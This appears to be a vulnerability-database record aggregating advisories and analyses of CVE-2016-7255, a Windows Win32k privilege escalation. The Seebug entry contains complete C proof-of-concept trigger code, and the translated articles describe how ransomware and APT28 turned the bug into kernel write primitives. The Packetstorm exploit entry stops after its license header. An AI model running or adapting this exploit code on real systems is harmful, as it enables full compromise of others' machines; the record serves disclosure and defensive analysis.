{"cve": [{"lastseen": "2021-02-02T06:28:11", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T07:00:00", "title": "CVE-2016-7255", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-7255", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T12:02:45", "description": "Multiple elevation of privilege vulnerabilities exist when the Windows kernel-mode drivers fail to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit these vulnerabilities, an attacker would first have to log on to the system. The attacker could then run a specially crafted application that exploits the vulnerabilities and takes control of the affected system.\n\nThe update addresses the vulnerabilities by correcting how the Windows kernel-mode driver handles objects in memory.\n", "published": "2016-11-10T00:00:00", "type": "seebug", "title": "Win32k elevation of privilege vulnerability (MS16-135) (CVE-2016-7255)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92530", "id": "SSV:92530", "sourceData": "\n // Reference: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n\r\n do \r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\r\n va_start(VaList,Format);\r\n\r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n\r\n va_end(VaList);\r\n\r\n } while (FALSE);\r\n\r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n\r\n return ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 
KEYEVENTF_KEYUP;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n\r\n\r\n int nFinalRet = -1;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n\r\n Sleep(1000);\r\n\r\n }\r\n\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n\r\n return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n\r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n\r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n\r\n do \r\n {\r\n\r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n\r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n\r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n\r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n\r\n 
#ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n\r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n\r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n SetParent(hWndChild , GetDesktopWindow() );\r\n\r\n SetForegroundWindow(hWndChild);\r\n\r\n _sim_alt_shift_tab(4);\r\n\r\n SwitchToThisWindow(hWndChild , TRUE);\r\n\r\n _sim_alt_shift_esc();\r\n\r\n\r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n\r\n\r\n } while (FALSE);\r\n\r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n\r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n\r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n return 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do \r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92530"}], "symantec": [{"lastseen": "2018-03-14T22:39:48", "bulletinFamily": "software", "cvelist": ["CVE-2016-7255"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. 
A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2016-11-08T00:00:00", "published": "2016-11-08T00:00:00", "id": "SMNTC-94064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94064", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-03-23T07:22:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "edition": 1, "description": "0x1 Foreword\n\n360 Internet Security Center recently captured a\u201cceber\u201dblackmailer Trojan variants, the variants with other\u201cceber\u201dblackmailer Trojan variants in the code The execution flow and not too big difference. Only it is worth noting that the Trojan exploit CVE-2016-7255 privilege elevation vulnerability on its own. right. This article will analyze the blackmailer for CVE-2016-7255 privilege elevation vulnerability in the use of the process.\n\n0x2 vulnerability details\n\nThe problem code is in win32k! xxxNextWindow, due to the lack of the necessary checks directly to the tagWND+0xC0 members offset 0x28 corresponding to the address of the value with 4 or operation, and tagWND+0xC0 is controllable, which leads to arbitrary address write. The vulnerable code is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417778. png)\n\nFigure 1 vulnerable code\n\nFig. v12 shows is tagWND structure, the structure as shown in omitted section.\n\n! [](/Article/UploadPic/2017-3/201732314417810. png)\n\nFigure 2 tagWND structure of the body\n\nFrom the above figure it can be seen, tagWND+0xC0 corresponds spmenu members, if there is a user state function can be the member of the assignment, you can trigger any address write. 
For 32-bit systems, you can directly call the SetWindowLong function SetWindowLong function will call the kernel mode function NtUserSetWindowLong the completion of this function; for 64-bit systems, does not exist you can use the user state function, but you can use the syscall of the way to call the kernel mode function NtUserSetWindowLong or function NtUserSetWindowLongPtr to complete this work. The following description is NtUserSetWindowLong function, NtUserSetWindowLongPtr the function execution process is the same.\n\nNtUserSetWindowLong function is just a shell, it will pass the parameter to the xxxSetWindowLong and call it, the function is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417836. png)\n\nFigure 3 xxxSetWindowLong function\n\nIn this function, the incoming nIndex judgment, and according to the nIndex value to perform the corresponding operation. For nIndex value of -16, and -20, and -12, and-21 situation, will call xxxSetWindowData function for processing. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417404. png)\n\nFigure 4 call xxxSetWindowData function for processing\n\nThe function receives xxxSetWindowLong of the parameters, when the nIndex parameter is-12 out of GWL_ID, and the operation of the window style is WS_CHILD or WS_CHILDWINDOW\uff080x40000000, will be the operation window tagWND structure spmenu members of the value set to dwNewLong it. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417349. png)\n\nFigure 5 The trigger of the position of vulnerability\n\nSince dwNewLong is to call NtUserSetWindowLong function when parameters are passed, the user mode process can use the syscall feel free to control it. And win32k! 
xxxNextWindow function of spmenu+0x28 members of With 4 or operation, thus triggering the arbitrary address write.\n\n0x3 exploit analysis\n\nFrom the vulnerability detail can be seen, the user mode process have to tagWND structure spmenu members the right to amend, the member is a tagMENU structure body, the structure is defined as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417245. png)\n\nFigure 6 tagMENU structure of the body\n\nNot difficult to see, xxxNextWindow function to modify the value is spmenu the fFlags member of the offset 0x28, and since the members with 0x4 or operation, and therefore the vulnerability can only be modified 1bit size of the area.\n\nYou can only modify 1bit on the surface it looks seemingly of little value, however this Trojan variant is not only to focus on this 1bit, but transferred to the tagWND structure of the cbWNDExtra member that represents the window the additional data size. If you can pass the Modify window the additional data size to cover the key address, and then re-use other way to write data, you can achieve perfect utilization.\n\nThen to complete the cbWNDExtra member of the write operation, it must obtain the cbWNDExtra member of the address or is the cbWNDExtra member relative to a known address offset. Except you must also obtain the additional address of the data or is relative to a known address offset to be calculated and written. For obtaining the cbWNDExtra member of the address, the Trojan creates two window\u201cExtraWnd1\u201dand\u201cExtraWND2\u201d, and the two Windows differs in its window class. cbWndExtra member that corresponds exactly to the tagWND the cbWNDExtra member. The program will be two window class. cbWndExtra members were assigned to 0x118 and 0x130, as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417654. 
png)\n\nFigure 7 create two Windows\n\nCreate a window after is to get the cbWNDExtra member of the tagWND structure of the offset, using HMValidateHandle function. The function and not in user mode export, but there's a user mode function IsMenu call it. Trojan horse determined by IsMenu related byte code of the location acquisition HMValidateHandle address.\n\n! [](/Article/UploadPic/2017-3/201732314417116. png)\n\nFigure 8 The use of byte-code positioning function\n\nHMValidateHandle function will leak tagWND structure of the content, so the Trojan can easily locate the cbWNDExtra member of the tagWND structure of the offset. For insurance purposes, the Trojan determines the two window tagWND structure of the cbWNDExtra member of the offset, when the two cbWNDExtra to register the window class to set the value of the 0x118 and 0x130 and offset are the same before the description of the offset effective.\n\n! [](/Article/UploadPic/2017-3/201732314417591. png)\n\n**[1] [[2]](<84568_2.htm>) [[3]](<84568_3.htm>) [next](<84568_2.htm>)**\n", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84568.htm", "id": "MYHACK58:62201784568", "type": "myhack58", "title": "\u201ccerber\u201dblackmailer for CVE-2016-7255 exploit analysis-exploit warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-01T14:57:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-7855", "CVE-2016-7255"], "edition": 1, "description": "The Windows kernel mention the right Vulnerability, CVE-2016-7255 has been a lot of media attention. In the 11 month's Patch Tuesday, Microsoft released for this vulnerability fix, as MS16-135 announcement of the part. According to Microsoft's description, CVE-2016-7255 mainly used to perform targeted attacks, and by some of the\u201cwild way\u201dto find samples. 
Google and Microsoft have confirmed that the Russian hacker group APT28 used the Flash vulnerability CVE-2016-7855 together with this kernel privilege escalation vulnerability to carry out targeted attacks. Google also published some discussion of this vulnerability: \nhttps://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html \nhttps://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/ \nhttp://securityaffairs.co/wordpress/53242/hacking/cve-2016-7255-zero-day.html \nThe McAfee Labs vulnerability research team spent a lot of time analyzing this vulnerability. In this article we briefly discuss some of our findings. \nAnalysis \nWe started the analysis from the MS16-135 patch. We soon noticed that MS16-135 updates win32k.sys on the target system, so our next step was to compare the two win32k.sys files from before and after installing the patch by binary diffing. Our test system was running Windows 7, version number 6.1.7601.23584. \nLooking at the binary diff results, we noted that the following function was modified. \n! [](/Article/UploadPic/2016-12/201612312262609. png? www. myhack58. com) \nFigure 1: the changed function in win32k.sys, xxxNextWindow \nAfter this preliminary investigation we concluded that the patch for CVE-2016-7255 consists entirely of a fix to the xxxNextWindow function in win32k.sys. \nThe following screenshot gives a higher-level overview of the changes the patch makes to xxxNextWindow(x, x): \n! [](/Article/UploadPic/2016-12/201612312262532. png? www. myhack58. com) \nFigure 2: high-level diff results for the function xxxNextWindow\nWe can see that some new logic, highlighted in red, was added to the fixed function. Zooming in on the first newly inserted basic block, we can see that new code was introduced that performs a comparison on the value at eax + 0x23: \n! [](/Article/UploadPic/2016-12/201612312262346. 
png? www. myhack58. com) \nFigure 3: xxxNextWindow inserted into the first basic block\nThen, our next newly inserted basic block saw a similar logic. \n! [](/Article/UploadPic/2016-12/201612312262724. png? www. myhack58. com) \nFigure 4: xxxNextWindow inserted in the second basic block\nGoogle has stated that the vulnerability\u201ccan be obtained by win32k. sys system call NtSetWindowLongPtr()for GWL_STYLE set to WS_CHILD window handle on the index GWLP_ID trigger.\u201c \nIn fact, NtSetWindowLongPtr()only played trigger this vulnerability to the role, and the fundamental reason is that xxxNextWindow it. More specifically, by NtSetWindowLongPtr()to set inappropriate parameter can trigger xxxNextWindow in the\u201cany address write\u201dscene. \nNow let's look at the unpatched xxxNextWindow(x, x, ...)of the decompiled version. \n! [](/Article/UploadPic/2016-12/201612312262345. png? www. myhack58. com) \nFigure 5: unrepaired xxxNextWindow the decompiled version\nApply the patch after xxxNextWindow(x, x, ...)as shown below: \n! [](/Article/UploadPic/2016-12/201612312262846. png? www. myhack58. com) \nFigure 6: the repaired xxxNextWindow the decompiled version\nPatched after the code using a conditional branch statement\u201c(*(_BYTE *)(v8 + 0x23) & 0xC0) != 0x40\u201denhanced parameter validation. \nIn this new statement, the variable v8 in eax is a GetNextQueueWindow call return value. \uff08See Figure\uff09 \n! [](/Article/UploadPic/2016-12/201612312262410. png? www. myhack58. com) \nFigure 7: variable v8 from the GetNextQueueWindow the call:\u201cv8 = _GetNextQueueWindow(v7, v31, 1);\u201d \nQuick View _GetNextQueueWindow(x, x, ...)is achieved, it reveals the function actually returns a pointer to the tagWND structure pointer. \nThe following figure shows the windbg in tagWND structure: \n! [](/Article/UploadPic/2016-12/201612312262587. png? www. myhack58. 
com) \nFigure 8: tagWND structure\nAnalyzing this code, we can get to know tagWND configuration offset 0x78 of the field is with the vulnerabilities associated. The following from a not repair function to decompile the lines of code confirms this: \n! [](/Article/UploadPic/2016-12/201612312262301. png? www. myhack58. com) \nFigure 9: unrepaired xxxNextWindow problems in the code\nNow the question becomes simple: if we can control in the v8+0x78 the value at the address, it is possible in the core region of an arbitrary address for a write operation, and it is likely you can achieve the mentioned rights. Fortunately, a user state of the API NtSetWindowLongPtr it can be used in this position is set to any value. \nThe following figure shows, we passed to the NtSetWindowLongPtr value, 0x41414141, is the reflection to the tagWND structure, through this vulnerability you can easily achieve arbitrary memory write. \n! [](/Article/UploadPic/2016-12/201612312262505. png? www. myhack58. com)\n\n**[1] [[2]](<82548_2.htm>) [next](<82548_2.htm>)**\n", "modified": "2016-12-31T00:00:00", "published": "2016-12-31T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82548.htm", "id": "MYHACK58:62201682548", "type": "myhack58", "title": "CVE-2016-7255: analysis of Mining the Windows kernel to mention the right vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T11:27:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "edition": 1, "description": "In 2015, FireEye released a Microsoft Office EPS\uff08Encapsulated PostScript in the two vulnerability details. Wherein, a is 0day vulnerabilities, one in the attack a few weeks before playing the patch. 
Recently, FireEye and Microsoft Office products in the discovery of three new 0day vulnerabilities, these vulnerabilities are being the attacker. \nIn 2017 at the end of 3, We detected another malicious file, which uses the EPS of the unknown vulnerabilities and the Windows Graphics Device Interface GDI in the recently patched vulnerability to deliver malicious software. Subsequently, Microsoft in the 2017 year 4 months to deactivate the EPS, but FireEye in EPS, and found a second unknown vulnerability. \nFireEye believes that there are two organizations Turla and another unknown financial criminal organizations is the use of the first EPS 0day Vulnerability CVE-2017-0261, and APT28, is to use the second EPS 0day Vulnerability CVE-2017-0262 and a new privilege escalation\uff08EOP\uff09 0day Vulnerability CVE-2017-0263 in. Turla and APT28 is Russian cyber espionage organizations, they will these 0day vulnerabilities applied to European Foreign and military Department. And this unidentified financial crime organizations are specifically targeted in the Middle East with offices of regional banks and global banks. In the following, we proceed with the introduction of EPS 0day vulnerabilities, related malware and new EOP 0day vulnerabilities. Each EPS 0day vulnerabilities are provided in the corresponding EOP exploit code, in order to provide the right, the code must bypass the sandbox, in order to perform the processing for the EPS FLTLDR. EXE instance. \nWe found that the malicious file is used for the delivery of three different payload. CVE-2017-0261 for delivery SHIRIME\uff08Turla and NETWIRE\uff08unknown financial crime organization, CVE-2017-0262 for delivery GAMEFISH\uff08APT28 it. CVE-2017-0263 for delivery GAMEFISH payload during the elevated privileges. \nFireEye the company's e-mail and network product detects these malicious files. 
\nIn these Vulnerability Information Disclosure, FireEye has been with the Microsoft Security Response Center MSRC for coordination. Microsoft recommends that all customers follow the security advice ADV170005 in the guidance, do a good job related security and Defense work. \nCVE-2017-0261--EPS\u201crestore\u201dUAF vulnerability \nOpen the Office document, FLTLDR. EXE will be used for rendering included the vulnerability of the embedded EPS image. Here the EPS file is a PostScript program, you can\u201crestore\u201doperation using the UAF vulnerability. \nAccording to the PostScript of the official Description:\u201ca local VM object allocation and the local VM in the existing objects of the modified called by the save and restore function is completed, in the name of the corresponding operation identifier, you can refer to them. save and restore can be used to package in the local VM in the PostScript language program related to the code. restore to be able to release the newly created object, and undo from the corresponding save operation after the existing object to modify.\u201d \nAs described above, the restore operation will be recovered from the save operation after the allocated memory. For the UAF vulnerability to say, when the forall operation of the combination, then it could not be better. Figure 1 shows the use of the save and restore operation of the pseudo-code. \n! [](/Article/UploadPic/2017-5/2017517184135487. png? www. myhack58. com) \nFigure 1: exploit the pseudo-code \nThe following operation allows the pseudo-code leaks the metadata, in order to achieve the Read/Write primitives: \n1\\. Create forall_proc array, only a single restore proc elements \n2\\. The EPS state is saved to eps_state \n3\\. In the Save created after the uaf_array \n4\\. Use forall operation to traverse uaf_array elements, for each element call forall_proc \n5\\. 
The uaf_array the first element is passed to the restore_proc of the call, the process contained in the forall_proc. \n6\\. restore_proc \nTo restore the initial state, the release uaf_array \nalloc_string process will be recycled to release the uaf_array \nforall_proc to call leak_proc \n7\\. forall operation of the follow-up calls for the recovery of uaf_array each element of the call leak_proc, these elements are now stored alloc_string the results of the process \nFigure 2 demonstrates in recovery after using uaf_array the debug log. \n! [](/Article/UploadPic/2017-5/2017517184136535. png? www. myhack58. com) \nFigure 2: uaf_array recycle the debug log \nThrough the operation of save operation after the identifier of the operation, the attacker can manipulate the memory layout, and the UAF vulnerability is converted to a read/write primitive. Figure 3 shows a forgery of the string, the length is set to 0x7fffffff, the cardinality is 0. \n! [](/Article/UploadPic/2017-5/2017517184136165. png? www. myhack58. com) \nFigure 3: Forge of the string object \nThe use of read and write arbitrary user memory capacity, The EPS program may further search the gadgets to build ROP chains, and create a file object. Figure 4 shows the in-memory fake file objects. \n! [](/Article/UploadPic/2017-5/2017517184136436. png? www. myhack58. com) \nFigure 4: with the ROP of the pseudo-file object \nBy Faking the file object call to closefile, the exploit code can be transferred to the ROP and start the shellcode with. Figure 5 shows closefile processing program part of the disassembly procedure. \n! [](/Article/UploadPic/2017-5/2017517184136717. png? www. myhack58. com) \nFigure 5: closefile Stack Pivot the disassembly code \nOnce executed, the malware will use the ROP chain to modify the stored shellcode memory region of the protection mechanisms. Thus, the shellcode will be able to perform FLTLDR. 
EXE running in a sandbox, and at the same time, in order to escape the sandbox detection, it also needs to further mention the right. \nAccording to FireEye found that the use of the vulnerability of the EPS program has two different versions. Wherein st07383. en17. docx using 32 or 64 bit version of CVE-2017-0001 to provide the right, and then perform a contains called SHIRIME malware inject the JavaScript payload. SHIRIME is Turla commonly used specially crafted JavaScript injector one, as the first stage of the payload into the target system, and implements the management and control functions. From the beginning of 2016 since we observed in the wild using the SHIRIME had many times revision, in this 0day vulnerability used in the attack was the latest version, v1. 0. 1004\uff09 \nThe second document Confirmation_letter. docx using 32 or 64 bit version of CVE-2016-7255 to mention the right, and then injected into the NETWIRE malware a new variant. According to our observation, the file is a different version of the file name is very similar. \nThese documents in the EPS program contains different logic to complete the ROP chain and shellcode construct. At the same time, it also uses a simple algorithm for the shellcode part of the obfuscation process, specifically as shown in Figure 6. 
\n\n\n**[1] [[2]](<86206_2.htm>) [[3]](<86206_3.htm>) [next](<86206_2.htm>)**\n", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "MYHACK58:62201786206", "href": "http://www.myhack58.com/Article/html/3/62/2017/86206.htm", "title": "For the APT organization to use the EPS vulnerabilities in and mention the right vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-01-12T02:03:22", "description": "", "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140468", "href": "https://packetstormsecurity.com/files/140468/Microsoft-Windows-Kernel-win32k.sys-NtSetWindowLongPtr-Privilege-Escalation.html", "sourceData": "`// ricklarabee.blogspot.com \n \n//This program is free software; you can redistribute it and/or \n//modify it under the terms of the GNU General Public License \n//as published by the Free Software Foundation. \n \n//This program is distributed in the hope that it will be useful, \n//but WITHOUT ANY WARRANTY; without even the implied warranty of \n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the \n//GNU General Public License for more details. \n \n//You should have received a copy of the GNU General Public License \n//along with this program; if not, write to the Free Software \n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
